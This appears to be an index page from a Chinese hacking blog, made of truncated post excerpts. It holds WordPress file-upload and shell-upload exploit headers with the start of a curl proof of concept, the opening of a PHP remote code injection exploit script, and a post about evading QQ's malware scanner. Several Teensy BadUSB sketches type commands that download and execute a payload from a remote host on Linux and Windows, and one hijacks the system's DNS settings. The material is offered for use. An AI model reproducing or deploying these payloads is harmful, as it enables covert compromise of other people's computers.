# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary FileUpload# Author: SANTHO ( @s4n7h0 )# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/# Category: WebApp / CMS / Wordpress# Version: 2.0.63 and less---------------------------------------------------Vulnerability Tracking======================Reported to vendor : Fri, May 9, 2014 at 9:20 PMVendor Acknowledgement : Sat, May 10, 2014 at 2:36 AMVendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at7:54 PMVulnerability Details=======================POST/index.php/photocrati_ajax?action=upload_imag ...继续阅读 (69)

####################### Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability# Exploit Author : Claudio Viviani# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip# Date : 2015-04-1# Dork Google: index of website-contact-form-with-file-uploadindex of /uploads/contact_files/# Tested on : Linux BackBox 4.0 / curl 7.35.0###################### Info :The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.####################### PoC:curl -k -X POST -F "action=uplo ...继续阅读 (304)

php*/error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);function http_send($host, $packet){if (!($sock = fsockopen($host, 80)))die( "\n[-] No response from {$host}:80\n");fwrite($sock, $packet);return stream_get_contents($sock);}print "#[+] Author: TUNISIAN CYBER\n";print "#[+] Script coded BY: Egidio Romano aka EgiX\n";print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability\n";print "#[+] Date: 19-04-2015\n";print "#[+] Vendor: http://www.open-letters.de/\n";print "#[+] Type: WebAPP\n";print "#[+] Tested on: KaliLinux (Debian)\n";print "#[+] CVE:\n";prin ...继续阅读 (58)

http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run Metasploit for Linux 64-bithttp://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run Metasploit for Linux 32-bithttp://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe Metasploit for Windows ...继续阅读 (82)

话说18号更新工具... 往各Q群里上传(QQ一直保持最新版,旧版不清楚)压缩包都是有密码的文件为K8飞刀20150418.rar 传不了提示风险把K8去掉,立马就可以传了... 这很明显的关键字了有人说会不会是文件md5被上报，如果是上报 那就是不管什么名字都杀了为什么去掉K8它就可以上传 这还不是杀关键字？后面用记事本改名成k8.rar 传也提示病毒这坑想着什么绕过K-8 K,8 K.8 等等 都无效....当时哥就火了在发微博骂TX傻吊...后面发现帖子不见了有人说是不是针对我的Q 我又换其它Q上传发现也不行后面发现用手机在讨论组可以直接上传任意文件。。。但是在Q群 还是会被拦截,说明QQ的文件查杀讨论组接口还未更新不过发这文章之前 又试了一下 发现TX那2B已经解封了 估计看到哥微博了上传不到几秒 别人下载的 就报了 不过杀的是飞刀？？我电脑没装360没确认。。。文件才编译完几秒不可能库里有记录 它杀 只能靠某些关键字来杀 ...继续阅读 (61)

1 先用 SDFormatter 格式化SD卡2 Win32DiskImager 把img镜像文件写入SD卡烧录进SD卡以后进入SD卡 记事本里修改cmdline.txt在最前面加上 ip=192.168.1.150 (不要自动获取)网线连PI到路由上 网上说在路由上可看到pi的IP但实际上发现看不到 先用putty连上PI后 也看不到好奇怪Tplink-版本为当前软件版本：1.0.0 Build 140904 Rel.66037n当前硬件版本：WR886N 2.0 00000000第一次运行 putty连接 pi/raspberry登陆 然后再sudo -i然后选默认那个 先扩展SD卡可用空间 若没出来就用 raspi-config 进入然后再选择finsh结束 再次输入sudo -i然后输入dhclient 先让PI能上网先 ping一下百度 确认添加国内软件源修改配置文件：root@k8teamPI:~# vi /etc/apt/sources.list直接先把官方源去掉或者前面加#号注释掉，添入以下源：deb http://mirrors.tuna.tsinghua.edu.cn/raspbian/raspbian/ wheezy main contrib non-free rpideb-src http://mirrors.tuna.tsinghua.edu.cn/ras ...继续阅读 (105)

树莓派(Raspberry Pi)渗透测试系统—PwnPi v3.0PwnPi是为树莓派（Raspberry Pi）开发的渗透测试发行版。它基于Linux操作系统，最新的3.0版本预装了超过200个网络安全工具可以很好的帮助渗透测试人员进相关工作。且默认情况下，已经有支持的aircrack-ng和无线网卡。http://www.pwnpi.com/ ...继续阅读 (69)

[硬件]Teensy USB渗透 独家同时兼容所有Windows和Linux系统下载者脚本直接复制代码有可能导致烧录脚本时出错实际请使用K8飞刀生成(因需要指定编码)//lnx & win httpDownExec by K8team 2015.4.6int myKeyBreak = 50;void setup() {//linux downexecdelay(5000);terminal();delay(3000);Keyboard.println("rm xxoo.out");delay(2000);Keyboard.println("wget http://192.168.1.104/x.out -O xxoo.out");delay(2000);Keyboard.println("chmod +x xxoo.out");Keyboard.println("./xxoo.out &");delay(2000);Keyboard.println("exit");//win downexecomg("cmd.exe");delay(500);Keyboard.println("color a&&cls;");delay(myKeyBreak);ascii_println("del x.exe");delay(myKeyBreak);ascii_println("echo strF ...继续阅读 (148)

直接复制代码有可能导致烧录脚本时出错实际请使用K8飞刀生成(因需要指定编码)//win_vbshttpdownExec by K8team 2015.3.24int myKeyBreak = 50;void setup() {delay(6000);omg("cmd.exe");delay(500);Keyboard.println("color a&&cls;");delay(myKeyBreak);ascii_println("del x.exe");delay(myKeyBreak);ascii_println("echo strFileURL = \"http://192.168.1.104/x.exe\" > K8.vbs");delay(myKeyBreak);ascii_println("echo strHDLocation = \"x.exe\" >> K8.vbs");delay(myKeyBreak);ascii_println("echo Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") >> K8.vbs");delay(myKeyBreak);ascii_println("echo objXMLHTTP.open \"GET\", strFileURL, false >> K8.vbs");delay(my ...继续阅读 (63)

直接复制代码有可能导致烧录脚本时出错实际请使用K8飞刀生成(因需要指定编码)这个应该是最简短的了 下载paylaod直接运行//lnx wgetHttpDownExec by K8team 2015.4.6#define TYPESPEED 15void setup(){//linux downexecdelay(5000);terminal();delay(3000);Keyboard.println("rm xxoo.out");delay(2000);Keyboard.println("wget http://192.168.1.104/x.out -O xxoo.out");delay(2000);Keyboard.println("chmod +x xxoo.out");Keyboard.println("./xxoo.out &");delay(2000);Keyboard.println("exit");}void loop(){}void terminal(){Keyboard.set_modifier(MODIFIERKEY_CTRL);Keyboard.send_now();Keyboard.set_modifier(MODIFIERKEY_CTRL| MODIFIERKEY_ALT);Keyboard.send_now();Keyboard.set_key1( ...继续阅读 (74)

直接复制代码有可能导致烧录脚本时出错实际请使用K8飞刀生成(因需要指定编码)K8飞刀中 还有过UAC的PowerShell版//win DnsUpdate by k8team 2015.4.10int myKeyBreak = 50;void setup() {delay(5000);omg("cmd.exe");delay(500);Keyboard.println("color a&&cls;");delay(myKeyBreak);ascii_println("echo Welcome to K8team!");delay(myKeyBreak);ascii_println("netsh interface ip set dns \"Local Area Connection\" static 8.8.8.8");delay(myKeyBreak);ascii_println("netsh interface ip set dns \"????\" static 8.8.8.8");delay(myKeyBreak);ascii_println("echo Hacked Finish!");delay(myKeyBreak);ascii_println("exit");delay(myKeyBreak);delay(10000);}void loop() {}void asc ...继续阅读 (74)